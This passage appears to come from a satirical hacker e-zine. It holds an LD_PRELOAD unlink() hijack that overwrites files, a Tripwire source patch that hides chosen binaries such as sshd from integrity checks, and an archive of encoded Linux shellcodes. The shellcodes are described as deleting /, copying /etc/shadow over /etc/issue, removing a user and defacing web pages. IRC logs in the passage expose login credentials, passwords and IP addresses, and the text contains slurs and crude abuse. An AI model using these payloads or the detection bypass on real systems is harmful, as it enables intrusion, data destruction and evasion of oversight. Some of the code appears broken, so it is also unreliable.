                unsigned int to_write;


                /* wowow optimized! tanenbaum would be proud! */
                if ((sb.st_size - i) >= BLOCK_SIZE)
                        to_write = BLOCK_SIZE;
                else
                        to_write = (sb.st_size - i);

                get_random_data (fd, to_write);
                i += to_write;
        }

        close (fd);
do_unlink:
        result = xunlink (path);
        return result;
}


void
_init ()
{
        void *handle;

        handle = dlopen (LIBC_PATH, RTLD_LAZY);

        if (handle == NULL)
        {
                fprintf (stderr, "Error preloading library: %s\n", dlerror ());
                exit (EXIT_FAILURE);
        }

        if ((xunlink = dlsym (handle, "unlink")) == NULL)
        {
                fprintf (stderr, "Error hijacking unlink(): %s\n", dlerror ());
                exit (EXIT_FAILURE);
        }

        return;
}




|=[ 0x06 ]=--------------------------------------------------------------=|

Tripwire is Silly
by The Blackhat Moriaty

Over recent years we have seen admins faced with a deluge of rootkits, such
as the infamous Linux Root Kit. This ingeniously and originally named tool
replaces system binaries such netstat, ls, ps and top! When an admin searches
for haxor files or unauthorized network connections he sees only what the
hacker wants him to see..... everywhere admins are in fear and confusion.
Until one day, out of the flames and panic comes... Tripwire, inc! With
their flashy new HIDS (yes guys, Hostbased Intrustion Detection System) they
promised to save the world from modified files. A lot of time and effort
went into making tripwire secure. You need not one, but two passwords to
modify tripwire's database, as it itself is heavily encrypted to prevent
tampering.

In response to this, infamous hackers such as Optyx of team Uberh4x0r
created a series of steadily worsening kernel-based rootkits such as KIS
(Keep It Superflous). Now, unfortunately, the days of kernel-based rootkits
are long gone. Although a lot of hackers haven't quite caught up with this
fact yet, RedHat (*the* #1 Linux perveyor) now ship a kernel that doesn't
export the symbol for sys_call_table! Oh gno! Once again, it looks as if
Tripwire, inc has found it's niche in the information security paradigm.
Without kernel level support how are we ever gonna be able to keep a trojan
on a box! (At the moment maybe some people are sitting there
saying "What, do you mean it's not Ok just to match the size/timstamp?", and
I urge these people to just put the keyboard
down and walk away.)

Well, I have spent many hours searching the source code of tripwire
looking for tricks to get around this big problem. Tripwire, Inc, have taken
a lot of time to make their source code hard to audit, and the infamous
Object Orientated Bloatware approach has been used to make any audit as
unpleasant as possible.

However, after several hours work I cam up with the following solution:
Just replace the Compare method in src/fco/fcoompare.cpp with the one below!
It's a pretty small file, and anyway patch is hard. You know you're probably
better off sticking to cun 'n' paste in notepad!

Just add new elements to the hidden array for every file you don't want
tripwire to check! Just do a 'make release' and copy the tripwire binary over
the top of the old one - remember to strip the binary and to match size and
timestamp!@

---[CUT HERE YOU MORON]--------------------------------%<--------------------------------------------------

///////////////////////////////////////////////////////////////////////////////
// Compare 
///////////////////////////////////////////////////////////////////////////////
uint32 cFCOCompare::Compare(const iFCO* pFco1, const iFCO* pFco2) 
{
	int i= 0;
	char *hidden[] = {
				"/usr/sbin/sshd",
				"/usr/sbin/tripwire",
				0};

	ASSERT(pFco1 != 0);
	ASSERT(pFco2 != 0);
	// first, make sure the fcos are of the same type...
	if(pFco1->GetType() != pFco2->GetType())
	{
		ASSERT( false );
		INTERNAL_ERROR( "fcocompare.cpp" );
	}

	/* hohoho letz be kradicle */
	while(hidden[i])
	{
		if(strcmp(pFco1->GetName().AsString().c_str(), hidden[i]) == 0)
		{
			return EQUAL;
		}
	}
	
	const iFCOPropSet* ps1		= pFco1->GetPropSet();
	const iFCOPropSet* ps2		= pFco2->GetPropSet();
	const cFCOPropVector& v1	= pFco1->GetPropSet()->GetValidVector();
	const cFCOPropVector& v2	= pFco2->GetPropSet()->GetValidVector();

	uint32 result = 0;

	mInvalidProps.SetSize( v1.GetSize() );
	mUnequalProps.SetSize( v1.GetSize() );
	mInvalidProps.Clear();
	mUnequalProps.Clear();

	// finally, comapre all the properties
	for(int i=0; i<v1.GetSize(); i++)
	{
		if(mPropsToCmp.ContainsItem(i))
		{
			if((! v1.ContainsItem(i)) || (! v2.ContainsItem(i)))
			{
				mInvalidProps.AddItem(i);
				result |= PROPS_NOT_ALL_VALID;
			}
			else
			{
				// comapre the properties
				if(ps1->GetPropAt(i)->Compare(ps2->GetPropAt(i), iFCOProp::OP_EQ) != iFCOProp::CMP_TRUE)
				{
					// they are not equal!
					mUnequalProps.AddItem(i);
					result |= PROPS_UNEQUAL;
				}
			}
		}
	}

	if( ! result )
		result = EQUAL;

	return result;
}

---[STOP CUTTING HERE YOU MORON]----------------------------%<----------------------------------------------




|=[ 0x07 ]=--------------------------------------------------------------=|

Evil Shellcodes
by The Blackhat Moriaty

Here is a nice little archive of ready-to-use Linux shellkodez 4 your 
perusal. All have been filtered for bad chars and tested in the wild!


/*
 * Opens /dev/audio, reads bytes fro /dev/random and
 * while they are non-null, writes them to /dev/audio.
 *
 * Note: We tested this one on Al Huger. We embedded this inside a gay
 * porn mpg, which exploited a local vulnerability in xine. Al thought he
 * was gonna watch Frisky Summer II, but imagine his surprise when this
 * garbage was heard thru his speakerz instead!
 */
char sweet_music[] =
"\xeb\x0d\x5e\x31\xc9\xb1\x95\x80\x36\x02\x46\xe2\xfa"
"\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51"
"\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x33\xfd\x81\xe6"
"\xf2\x8f\xb1\x7c\x02\x02\x02\xba\x07\x02\x02\x02\xbb"
"\x03\x02\x02\x02\x8b\xf8\x51\x8b\xf1\xcf\x82\x59\x8b"
"\x47\xee\x8f\xb1\x8b\x02\x02\x02\xba\x07\x02\x02\x02"
"\x8b\xfb\x51\x8b\xf1\xcf\x82\x59\x88\x57\xf1\x86\xd0"
"\x8b\xc5\x8a\x57\xe9\x76\x2a\x8f\x4f\xf1\xb8\x03\x02"
"\x02\x02\xbc\x06\x02\x02\x02\x92\xba\x01\x02\x02\x02"
"\x51\x8b\xf9\xcf\x82\x59\x8b\xf2\x51\x89\x5f\xee\xcf"
"\x82\x59\x82\x7f\xe9\x02\x77\xe4\x8f\x67\xf6\x59\x5c"
"\x5d\xcb\xc1\x2d\x66\x67\x74\x2d\x63\x77\x66\x6b\x6d"
"\x02\x2d\x66\x67\x74\x2d\x70\x63\x6c\x66\x6d\x6f\x02";

/*
 * Chmods /sbin/init non-executable and then writes
 * "logout" to the end of the root user's login
 * file.
 *
 * Note: This idea was borrowed from the infamous seiki ownage log. So,
 * I guess not terribly original but still a classic in its own right.
 */
char chmod_logout[] =
"\xeb\x0d\x5e\x31\xc9\xb1\x8f\x80\x36\x02\x46\xe2\xfa"
"\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51"
"\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x81\xe6\xf2\x33"
"\xf4\x8f\xb9\x6d\x02\x02\x02\xbb\xc2\x03\x02\x02\xba"
"\x0d\x02\x02\x02\x51\x8b\xf9\xcf\x82\x59\x8f\xb9\x78"
"\x02\x02\x02\xbb\x03\x02\x02\x02\xba\x07\x02\x02\x02"
"\x8b\xf0\x51\x8b\xf9\xcf\x82\x59\x8f\x91\x85\x02\x02"
"\x02\x8b\xc5\x8b\xd3\xba\x06\x02\x02\x02\xb8\x05\x02"
"\x02\x02\x51\x8b\xf9\xcf\x82\x59\xba\x04\x02\x02\x02"
"\x51\x8b\xf9\xcf\x82\x59\x8f\x67\xf6\x59\x5c\x5d\xcb"
"\xc1\x2d\x71\x60\x6b\x6c\x2d\x6b\x6c\x6b\x76\x02\x2d"
"\x70\x6d\x6d\x76\x2d\x2c\x6e\x6d\x65\x6b\x6c\x02\x6e"
"\x6d\x65\x6d\x77\x76\x08\x02";

/*
 * As used in the infamous cryptome.org defacement,
 * writes "It was bighawk!" to the index.html
 */
char cryptome[] =
"\xeb\x0d\x5e\x31\xc9\xb1\x83\x80\x36\x02\x46\xe2\xfa"
"\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51"
"\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x33\xf4\x81\xe6"
"\xf2\x8f\xb9\x5b\x02\x02\x02\xbb\x03\x02\x02\x02\xba"
"\x07\x02\x02\x02\x8b\xf0\x51\x8b\xf9\xcf\x82\x59\x8f"
"\x91\x70\x02\x02\x02\x8b\xc5\x8b\xd3\xba\x06\x02\x02"
"\x02\xb8\x12\x02\x02\x02\x51\x8b\xf9\xcf\x82\x59\xba"
"\x04\x02\x02\x02\x51\x8b\xf9\xcf\x82\x59\x8f\x67\xf6"
"\x59\x5c\x5d\xcb\xc1\x2d\x74\x63\x70\x2d\x75\x75\x75"
"\x2d\x6a\x76\x6f\x6e\x2d\x6b\x6c\x66\x67\x7a\x2c\x6a"
"\x76\x6f\x6e\x02\x4b\x76\x22\x75\x77\x78\x22\x40\x6b"
"\x65\x6a\x63\x75\x69\x23\x08\x02";


/* 
 * Copies /etc/shadow over the top of /etc/issue
 *
 * Note: Pure fun... this never gets old
 */
char we_have_issues[] = 
"\xeb\x0d\x5e\x31\xc9\xb1\xc3\x80\x36\x02\x46\xe2\xfa"
"\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51"
"\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x33\xd0\x81\xe6"
"\xf2\x8f\xb9\xae\x02\x02\x02\xba\x07\x02\x02\x02\x8b"
"\xd3\x51\x8b\xf9\xcf\x82\x59\x8b\xc5\x8f\xb1\xba\x02"
"\x02\x02\xbb\x03\x02\x02\x02\xba\x07\x02\x02\x02\x51"
"\x8b\xf1\xcf\x82\x59\x8b\xc4\x8f\x8f\xea\xf9\xfd\xfd"
"\xb8\x02\x06\x02\x02\xba\x01\x02\x02\x02\x51\x8b\xf9"
"\xcf\x82\x59\x87\xc2\x8b\x87\xd6\xf9\xfd\xfd\x7c\x2c"
"\x8f\x74\x02\xba\x06\x02\x02\x02\x89\x97\xd6\xf9\xfd"
"\xfd\x51\x8b\xf1\xcf\x82\x59\xba\x01\x02\x02\x02\xb8"
"\x02\x06\x02\x02\x51\x8b\xf9\xcf\x82\x59\x87\xc2\x8b"
"\x87\xd6\xf9\xfd\xfd\x7d\xd7\xbb\x04\x02\x02\x02\x8b"
"\xca\x51\x8b\xf9\xcf\x82\x59\x8b\xca\x51\x8b\xf1\xcf"
"\x82\x59\x8f\x67\xf6\x59\x5c\x5d\xcb\xc1\x2d\x67\x76"
"\x61\x2d\x71\x6a\x63\x66\x6d\x75\x02\x2d\x67\x76\x61"
"\x2d\x6b\x71\x71\x77\x67\x02":

/*
 * Removes jobe's entries from /etc/[passwd/shadow]
 * then rm's /home/jobe
 */
char joberm[] = 
"\x52\x8e\xe2\x50\x51\x54\xef\x07\x07\x07\x07\x5c\x84"
"\xc4\xf2\x8a\x8c\x41\x05\x07\x07\x86\xeb\x4b\x03\x07"
"\x07\x8a\xbc\x49\x05\x07\x07\x8e\x8a\xdf\xfc\xf8\xf8"
"\x8a\xb4\x55\x05\x07\x07\x8a\x8c\x5a\x05\x07\x07\x8e"
"\x8a\xd3\xfc\xf8\xf8\x84\xe3\xf7\x36\xd5\x8e\xba\xdb"
"\xfc\xf8\xf8\x8e\xb2\xe7\xfc\xf8\xf8\xc0\x82\xe3\xfc"
"\xf8\xf8\x07\x07\x07\x07\xbe\x05\x07\x07\x07\xbf\x02"
"\x07\x07\x07\x54\x8c\x9a\xd3\xfc\xf8\xf8\xca\x87\x5c"
"\x8e\xc0\x8a\x84\x6e\x05\x07\x07\x8e\x82\xd7\xfc\xf8"
"\xf8\xbe\x46\x07\x07\x07\xbd\xc7\x06\x07\x07\xbf\x02"
"\x07\x07\x07\x54\x8c\x9a\xd7\xfc\xf8\xf8\xca\x87\x5c"
"\x8e\x82\xb7\xfc\xf8\xf8\x8a\x82\xef\xfc\xf8\xf8\x8e"
"\x82\xbb\xfc\xf8\xf8\x8e\x82\xcb\xfc\xf8\xf8\xbd\x07"
"\x03\x07\x07\xbf\x04\x07\x07\x07\x8c\x8a\xbb\xfc\xf8"
"\xf8\x54\x8e\xfc\xca\x87\x5c\x82\xc7\x8e\x82\xb3\xfc"
"\xf8\xf8\x73\x66\x8c\x82\xef\xfc\xf8\xf8\x8e\x82\xab"
"\xfc\xf8\xf8\xb9\x04\x07\x07\x07\x86\xba\xab\xfc\xf8"
"\xf8\x6d\x68\x65\x62\x73\x1c\xbf\x03\x07\x07\x07\x8c"
"\x8a\xcb\xfc\xf8\xf8\x8c\x92\xb3\xfc\xf8\xf8\x54\x8c"
"\x9a\xb7\xfc\xf8\xf8\xca\x87\x5c\x8c\x82\xbb\xfc\xf8"
"\xf8\x8e\x82\xcb\xfc\xf8\xf8\x8c\x8a\xbb\xfc\xf8\xf8"
"\x8e\xf7\xbd\x07\x03\x07\x07\x54\x8e\xfc\xca\x87\x5c"
"\x82\xc7\x8e\x82\xb3\xfc\xf8\xf8\x72\xb7\xb9\x01\x07"
"\x07\x07\x8e\xf7\x54\x8e\xfc\xca\x87\x5c\x8e\xf7\x54"
"\x8c\x9a\xb7\xfc\xf8\xf8\xca\x87\x5c\x8c\x8a\xd3\xfc"
"\xf8\xf8\xbf\x21\x07\x07\x07\x54\x8c\x9a\xd7\xfc\xf8"
"\xf8\xca\x87\x5c\x8a\x94\x71\x05\x07\x07\x36\xce\xb8"
"\x02\x07\x07\x07\x8e\x92\xc3\xfc\xf8\xf8\x8e\xff\x8e"
"\xcd\x54\x8c\x9a\xc3\xfc\xf8\xf8\xca\x87\x5c\x8e\xc1"
"\xbe\x46\x07\x07\x07\xbd\xc7\x06\x07\x07\x8e\xff\x54"
"\x8c\x9a\xd7\xfc\xf8\xf8\xca\x87\x5c\x8e\xc0\x8c\x8a"
"\xbb\xfc\xf8\xf8\xbd\x07\x03\x07\x07\xbf\x04\x07\x07"
"\x07\x54\x8e\xf4\xca\x87\x5c\x82\xc7\x8e\x82\xb3\xfc"
"\xf8\xf8\x73\x4b\x8c\x82\xef\xfc\xf8\xf8\x8e\x82\xab"
"\xfc\xf8\xf8\x8a\x71\x07\x86\xba\xab\xfc\xf8\xf8\x6d"
"\x68\x65\x62\x73\x16\xbf\x03\x07\x07\x07\x8c\x92\xb3"
"\xfc\xf8\xf8\x54\x8e\xfc\xca\x87\x5c\x8c\x8a\xbb\xfc"
"\xf8\xf8\xbf\x04\x07\x07\x07\xbd\x07\x03\x07\x07\x54"
"\x8e\xf4\xca\x87\x5c\x82\xc7\x8e\x82\xb3\xfc\xf8\xf8"
"\x72\xc4\xbe\x01\x07\x07\x07\x8e\xcf\x54\x8e\xf4\xca"
"\x87\x5c\x8e\xcf\x54\x8e\xfc\xca\x87\x5c\x8c\x8a\xc3"
"\xfc\xf8\xf8\xbf\x21\x07\x07\x07\x54\x8c\x9a\xd7\xfc"
"\xf8\xf8\xca\x87\x5c\x8a\x8a\xdf\xfc\xf8\xf8\x36\xd5"
"\xbf\x0c\x07\x07\x07\x54\x8c\x9a\xdf\xfc\xf8\xf8\xca"
"\x87\x5c\x8a\x62\xf3\x5c\x59\x58\xce\xc4\x28\x65\x6e"
"\x69\x28\x75\x6a\x07\x2a\x75\x61\x07\x28\x6f\x68\x6a"
"\x62\x28\x6d\x68\x65\x62\x07\x28\x62\x73\x64\x28\x77"
"\x66\x74\x74\x70\x63\x07\x28\x73\x6a\x77\x28\x29\x6d"
"\x68\x65\x62\x75\x6a\x07\x28\x62\x73\x64\x28\x74\x6f"
"\x66\x63\x68\x70\x07":

/*
 * Reads a single byte from /dev/random, if it's
 * 0x0 then rm's /
 *
 * Note: The shellcode version of phrack.efnet.ru's own
 * hacker russian roulette.
 */
char randrm[] = 
"\xeb\x0d\x5e\x31\xc9\xb1\x86\x80\x36\x02\x46\xe2\xfa"
"\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51"
"\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x81\xee\x3e\x8f"
"\x7f\xca\x8f\xb1\x02\x02\x02\x02\xfe\xbb\x07\x02\x02"
"\x02\x8b\x7f\xbe\x81\xe6\xf2\xf1\xa7\xba\x07\x02\x02"
"\x02\x8f\xb9\x02\x02\x02\x02\x33\xd0\x51\x8b\xf9\xcf"
"\x82\x59\x8f\x57\xc5\x8b\x57\xc2\x8b\xc5\xb8\x03\x02"
"\x02\x02\xba\x01\x02\x02\x02\x89\x4f\xc2\x51\x8b\xf9"
"\xcf\x82\x59\x82\x7f\xc5\x02\x77\x13\xba\x09\x02\x02"
"\x02\x89\x4f\xbe\x33\xd0\x51\x89\x5f\xca\xcf\x82\x59"
"\x8f\x67\xf6\x59\x5c\x5d\xcb\xc1\x2d\x60\x6b\x6c\x2d"
"\x70\x6f\x02\x2f\x70\x64\x02\x7c\x02\x2d\x02";





|=[ 0x08 ]=--------------------------------------------------------------=|

Really Dangerous Cisco Shit Released
by FX

if the w0rld g4sped w/ anticipation when the legendary dvdman made a subtle
r3f3r3nc3 2 hiz c1sq0 rem0te shell penetration t00l on irc, and the logz were
published 4 all, that wuz nothing compared to the widespr34d p4n1c th@
f0llowed phen0elitz new shit. apparently, there iz a 2 GB s1gned 1nteger
0verflow in cisc0 routerz!!!!!!

let'z view the approximate timeline 4 phen0elitz development of this expl0it:
Jan 5.	3PM	finish reading thru ios 11.3 src code 4 the day
	4PM	contact the 15 person phen0elit art team
	4.5PM	fritzie calls back with a great idea for an 'exploit name'
	4.6PM	holgar iz w0rking on the ascii banner, wilhelm is making the
		t-shirt
Jan 6.  10AM	prepare to see if the vulnerability is exploitable, write POC
	11AM	start sending 2gb of data to the r0uter on the lokal NET
	8PM	end of specially crafted data arrives @ r0uter
Jan 7-	11AM	start sending daily 2 gb
Feb 25	8PM	0h b0y 0 b0y! my r0uter finally cr4shed 2day! l3mm3 r3ad l0gz
Feb 26	8PM	1t w0rked! n0w 1 n33d 2 sk4n th3 n3t & f1nd an0ther r0uter
		s0mewhere runn1ng the exact same i0s vers10n 0n the s4me
		ch1ps3t, w1th the same number of open s0cketz, & with the
		exact same dev1c3z
Mar 8	2PM	g0t it!
Mar 8	3PM	try rem0te exploit!
Jul 20	5AM	w0w! my wh0le packet finally arrived, 1t w0rkd! n0w letz have
		fun w/ th1z k0rean r0uter until the adm1n getz b4ck fr0m
		falun g0ng & findz h1z c0nf1g is m1ss1ng
Jul 20	7AM	sent advis0ry out 2 dave ahmad




|=[ 0x09 ]=--------------------------------------------------------------=|

The Defcon Review
by phr4k st4ff

s0, this yearz defcon really suqd, even m0re than all the onez in recent
mem0ry. well, it could have been worse, phrack staff could have been stranded
at s0me place like CCC, with a bunch of y0deling european haqr fagg0tz with
roq-climbing bakpakz & bootz & green sh0rtz & suspenderz listen1ng 2 dav1d
hasselh0ff tapez while stealth talkz about the new pr0cfs function he f0und
and hendy playz w1th h1z sh0elaces.... 

so what did u miss if u werent @ defc0n?
h0pefully a lizt will b eazier than thiz dial0gue f0rm@:

o crispin c0wan
	o haz a phd
	o teachez a few intro 2 os coursez @ oregon inst. of tech or smtg.
		o also writes "secure" software
		o agreed that he "fucked up" when his immunix stackguard
		  th1nk t4nk decided 2 plaze the c4n4ry 0n the st4q
		  betw33n the fr4me p0inter & the st4ck p0inter
	o wuz @ defk0n hakn it up with hiz companyz ctf team
	o stayed in vegas for a week, but didnt stop playing ctf
		o somehow, 20 d00dz from immunix got paid 2 go 2 vegas 2
		  play ctf??
		o immunix l0st ctf

o kev1n m1tnick
	o the c0nd0r wuz wandering ar0und defk0n like an austistic kid 
	  inside the myst3ry fun h0uze
	o tr1ed tlaking 2 him but apparently he wuznt 2 happy cuz we w3r3
	  th3 0nly ppl th3r3 th@ werent try1ng 2 kizz h1z azz
	o rej3kted 0ur 0fferz 2 g1ve h1m the upd8d k0py 0f jsz's m41lsp00lz

o w1nn schw4rt4u
	o st1ll f@ & bl04t3d
	o s0me n4sty 4ss ch1x d01ng h4qr je0pardy
	o 4sk3d s0me krazy tekn1k4l quest10nz l1ke
	  "what does the n0p instrukt10n d0 in ass3mbly?" &
	  thus b4ffl3d the kr0wd

o l4nce sp1tzc0q
	o n0t really sure 4b0ut th1z 0n3
	o l3ft 4ft3r day1 becuz 0f 4ll the h4rr4ssm3nt... h4h4h4h!

o n30nfr30n
	o we h4d n0 idea wh0 th1z guy wuz unt1l s0meb0dy sh0uted:
	  "hey rnt u ne0nfre0n fr0m und3rn3t?!?!?!?!"

o p4ck3t f41ry
	o the highl1te 0f every defk0n, wuz h3r3 th1z year 2!
	o th1z y34r wearing leather ch4pz 0ver kut0ff st0new4sh3d j34nz

o h4ck3r d14r13z
	o sp0ttd 2 memberz 0f th1s l3g3nd4ry s4g4
	o hd m00re, beam1ng 4ft3r h1s r1pp3d xf0cus dc0m rel34s3
	o s4w 4nn4 m00r3 (4k4 st4rl4 pur3h34rt), th0ught sh3 w4z a d00d @1st

o h4x0r g1rlz
	o p0rn0graph1c f1lmz w1th g1rlz simultane0uzly str1ppn/us1ng nmap
	o def1n1tely the 0nly t1me ull hear 'fy0d0r' and 'pussy' in the same
	  p4r4gr4ph
	o th3z3 g1rlz were 2 nause4t1ngly disgust1ng 2 fuq, & bes1d3z we
	  r4n 0ut 0f 0ur preskr1pt0n 4 v4ltr3x, s0 the 0nly pers0n br4v3
	  en0ugh 2 get a p4rty f4v0r 0ut 0f the d34l wuz tr4shk4n m4n

DISCLAIMER: 1m n0t sure h0w funny th1z wuz, pr0bably n0t @ all becuz th3r3
really wuz n0th1ng 2 rep0rt. DC 12 sh0uld be a l0t m0re fun, j01n us th3r3
w3r3 g0nna k0mm1t mass su1c1de!




|=[ 0x0a ]=--------------------------------------------------------------=|

A Pr0ix IRC Medley
by the b1g leb0wsk1


EDITORS NOTE: We continued this exhilarating piece here, at the end of
Linenoise just because of its sheer immense volume. This piece was also
submitted much later by the author, who had to actually create a
specialized log cutting program that made use of the Boyer-Moore fast string
searching algorithm, to find the most interesting snippets from gigabytes
of pr0ix irc logs.


Ever wanted access to hack.co.za ?

[26 Aug/05:42am] (pr0ix) i have a static ip where im coming from
[26 Aug/05:43am] <cami> ok
[26 Aug/05:43am] (pr0ix) 195.254.225.135 source
[26 Aug/05:43am] <cami> host: hack.co.za
[26 Aug/05:43am] <cami> user: m0rkus
[26 Aug/05:43am] <cami> pass: d0rkus
[26 Aug/05:44am] (pr0ix) k

/*************************************************/

Or @ on #darknet ?

[10 Aug/12:28pm] -Mengele- Congradulations pr0ix!
[10 Aug/12:28pm] -Mengele- dvdman has given you Ops with flags o on #darknet.
[10 Aug/12:28pm] -Mengele- Please set a password: /msg Mengele pass <password>
[10 Aug/12:28pm] -Mengele- where <password> is your selected password.
[10 Aug/12:28pm] -Mengele- You can get ops by: /msg Mengele op <password>
[11 Aug/01:24am] (pr0ix) pass fuckm3h4rd!
[11 Aug/01:24am] -Mengele- Password set to: 'fuckm3h4rd!'.
[20 Aug/01:58am] -Mengele- Your flags have been upgraded to o on #darknet.

/*************************************************/

Me me me me me !!!!

[6 Aug/01:59am] @ Topic by pr0ix: if anyone is interested to make a botnet /msg pr0ix

/*************************************************/

And so do we!!!

[2 Sep/02:45am] (pr0ix) i have enough log's from different places to get you busted
[2 Sep/02:46am] <sistom> umm....

/*************************************************/

Anyone want CANVAS?, thanx dvdman !!

[11 Aug/02:40am] <dvdman> http://codes.dvdman.ws/warez/CANVAS
[11 Aug/02:41am] (pr0ix) whats that?
[11 Aug/02:42am] <dvdman> david aidels canvas
[11 Aug/02:42am] <dvdman> its a exploit thingy

/*************************************************/

Its one of lifes mysteries !

[22 Aug/02:23am] (pr0ix) btw how the fuck can i sniff ftp passwords with tcpdump?

[22 Aug/02:46am] (pr0ix) explain me howto sniff with tcpdump
[22 Aug/02:47am] <c0n> tcpdump -lnettts 1600 -Xw tcpdump.out & tail -f tcpdump.out
[22 Aug/02:47am] <c0n> hmm
[22 Aug/02:47am] <c0n> that should work

/*************************************************/

Chiqz fuck for shellcode ?!?!

[5 Sep/08:19am] <sorbo> damn they didn't post zacode.c .. prolly banner was too lame even though the 21b shellcode worked.... eheheh
 ill prolly not b able to eat her pussyt now 
[5 Sep/08:19am] (pr0ix) why do you care?
[5 Sep/08:20am] (pr0ix) who is that chick?
[5 Sep/08:20am] <sorbo> cuz she was willing to fuck me =P
[5 Sep/08:20am] <sorbo> eheheh she's not even that hot actually

/*************************************************/

Someone send pr0ix a copy of "Shell scripting for dummies"

[4 Aug/03:03am] (pr0ix) hmm listen, i have a small problem where you can help me
[4 Aug/03:03am] <rxtx> sup?
[4 Aug/03:03am] (pr0ix) i have some files in a directory like 20030701_syslog.log 20030702_syslog.log etc etc
[4 Aug/03:03am] <rxtx> yeah
[4 Aug/03:03am] (pr0ix) i want to cat every single file and grep -i for DISCONNECT and write it do date.log
[4 Aug/03:04am] (pr0ix) i mean: cat 20030701_syslog.log|grep -r DISCONNECT >20030701.logs
[4 Aug/03:04am] (pr0ix) how to automate this?
[4 Aug/03:04am] (pr0ix) cat 20030702_syslog.log|grep -r DISCONNECT >20030702.logs
[4 Aug/03:04am] (pr0ix) etc etc

/*************************************************/

Yes, that truly would be the best. It sounds very feasible too!

[8 Sep/03:12am] <moph_> what kind of trojan do you need?
[8 Sep/03:12am] (pr0ix) ssh
[8 Sep/03:12am] (pr0ix) best would be all in one SSH/INETD/APACHE+sniffer
[8 Sep/03:13am] (pr0ix) even a rootkit would do the job, it has to be private, everything else gets detected

/*************************************************/

You've only just realised ??

[4 Aug/02:53pm] (pr0ix) wait wait :P
[4 Aug/02:54pm] (pr0ix) i have 0 clue..

/*************************************************/

Don't we?

[7 Aug/09:07am] (pr0ix) 1] you don't even know from what fucking place on the earth i come from
[7 Aug/09:07am] (pr0ix) 2] you have zero clue what networks i admin
[7 Aug/09:07am] (pr0ix) 3] you dont know what and where i work

/*************************************************/

Opers abusing their status? tututut

[8 Sep/07:32am] (pr0ix) do me a favour /stat jaf
[8 Sep/07:33am] <netmunky> /stat l?
[8 Sep/07:33am] (pr0ix) yeah
[8 Sep/07:33am] (pr0ix) no even
[8 Sep/07:33am] (pr0ix) just /stat jaf
[8 Sep/07:34am] <netmunky> /stat is an ambiguous command, /stats jaf shows nothing
[8 Sep/07:34am] <netmunky> /stats l gives ... irc.choopa.net jaf[~jaf@phrack.com.br] 0 2740 160 1707 54 :31847 3 -
[8 Sep/07:34am] (pr0ix) hmm
[8 Sep/07:34am] (pr0ix) you are global O ?
[8 Sep/07:34am] <netmunky> yup
[8 Sep/07:38am] (pr0ix) ok we found it
[8 Sep/07:38am] (pr0ix) [blane(blane@oper.efnet.demon.co.uk)] unknown@193.99.135.162 is not valid for the account specified
[8 Sep/07:38am] (pr0ix) thx anyways
[8 Sep/07:38am] (pr0ix) found the real ip
[8 Sep/07:39am] (pr0ix) fuck that is blane's work ip
[8 Sep/07:42am] <netmunky> the ip isn't 140.164.30.200?
[8 Sep/07:43am] (pr0ix) no
[8 Sep/07:43am] (pr0ix) do: /dns 140.164.30.200
[8 Sep/07:43am] <netmunky> try asking someone on choopa?
[8 Sep/07:43am] (pr0ix) everyone idle
[8 Sep/07:44am] <netmunky> ... irc.choopa.net jaf[~jaf@198.169.185.135] 0 2848 167 1754 55 :32461 8 -
[8 Sep/07:44am] <netmunky> /stats L jaf
[8 Sep/07:44am] (pr0ix) great thank you
[8 Sep/07:44am] (pr0ix) great great
[8 Sep/10:13am] (pr0ix) hmm can you /stat jaf again?
[8 Sep/10:15am] <netmunky> ... irc.secsup.org jaf[~jaf@198.169.185.135] 0 382 26 162 4 :2534 0 -

/*************************************************/

Thanks !

[20 Aug/10:57am] (pr0ix) ssh reptile.cube11.net -p 2222 -l lsd
[20 Aug/10:57am] (pr0ix) pass ist try2fix!
[20 Aug/11:48am] (pr0ix) reptile.cube11.net 2222 panther/!changeme

/*************************************************/

pr0ix aka z3r0c00l !!

[5 Sep/03:16am] <cami> dood.. you have no idea what you are talking about.. your technical knowledge is VERY limited..
[26 Aug/10:10am] (pr0ix) ja fuck with the bes, die like the rest

/*************************************************/

pr0ix repeating...


[4 Sep/08:07am] <phooxir1> well, nothing really.. playing with linux kernel 2.6
[4 Sep/08:07am] <phooxir1> hooking systemcalls through dma
[4 Sep/08:07am] <phooxir1> quite nice 
[4 Sep/08:07am] (pr0ix) interesting.. got some new warez?

[4 Sep/08:07am] (pr0ix) greets
[4 Sep/08:08am] (pr0ix) listen is it possible to hook systemcalls trough dma?
[4 Sep/08:11am] <kokanin> i have absolutely no idea whatsoever :)

/* Lol, it doesn't stop there ! Does anyone actually think pr0ix even knows what an off by one is? */

[4 Sep/08:09am] (pr0ix) rumours about a OpenBSD ftpd off by one are going around
[4 Sep/08:10am] <phooxir1> heared that, they said the bug is in the MKDIR routine, I went through it, no offbyone bug there, no noth
ing.

[5 Sep/02:57am] (pr0ix) hmm
[5 Sep/02:58am] (pr0ix) heared that, they said the bug is in the MKDIR routine, I went through it, no offbyone bug there, no nothing
[5 Sep/02:58am] (pr0ix) maybe you found something else
[5 Sep/02:58am] <sorbo> realpath
[5 Sep/02:58am] (pr0ix) sftp or ftpd?


/*************************************************/

pr0ix gets tough!..

[11 Aug/01:43am] (pr0ix) i dont even know "mrdivide" i dont like kidz at all
[11 Aug/01:44am] <nrm1> mrdivide owns the botnet that is currently controling #darknet
[11 Aug/01:44am] <nrm1> im not a kid
[11 Aug/01:44am] (pr0ix) watch your mouth if you want to stay and dont fuck with people you don't know.


[8 Sep/07:48am] (pr0ix) listen, just a advice from me, stop playing with CNR's reverse Zone's
[8 Sep/07:48am] (pr0ix) just a advice
[8 Sep/07:48am] <jaf> what is CNR's ?
[8 Sep/07:48am] (pr0ix) you know what i mean


[8 Sep/08:01am] (pr0ix) you little fag, what makes you think i own that box?
[8 Sep/08:01am] (pr0ix) and i think the biggest kid are you
[8 Sep/08:02am] <jaf> nah
[8 Sep/08:02am] <jaf> im l33t, you not


[26 Aug/03:12am] <ech0> its childish
